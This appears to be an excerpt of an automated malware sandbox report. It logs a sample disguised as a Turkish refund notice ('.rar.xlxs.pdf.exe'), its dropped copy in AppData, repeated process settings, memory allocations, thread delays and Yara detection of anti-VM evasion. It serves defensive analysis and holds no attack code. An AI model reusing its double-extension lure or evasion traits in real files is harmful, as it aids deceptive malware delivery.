Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Memory allocated: 1080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Memory allocated: 2EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Memory allocated: 2C30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Memory allocated: 77C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Memory allocated: 87C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Memory allocated: 8960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Memory allocated: 9960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Memory allocated: A090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Memory allocated: B090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Memory allocated: 1160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Memory allocated: 2C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Memory allocated: 4C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory allocated: 2630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory allocated: 28A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory allocated: 26A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory allocated: 6DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory allocated: 7DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory allocated: 7F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory allocated: 8F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory allocated: 9630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory allocated: A630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory allocated: B630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory allocated: 13E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory allocated: 2D90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory allocated: 4D90000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599858	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599734	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599613	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599474	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599350	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599242	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599138	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597853	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597732	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597624	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596749	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595873	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595542	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595405	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595275	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595145	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 594648	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 594053	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593937	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593827	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593718	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593609	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593497	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593390	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593280	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593171	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593061	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 592953	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 592843	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 592731	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 592624	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 592515	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 592406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598873
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598750
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598640
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598271
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598065
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 597769
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 597444
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 597324
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 597217
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 597108
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596873
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596218
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596108
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595998
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595889
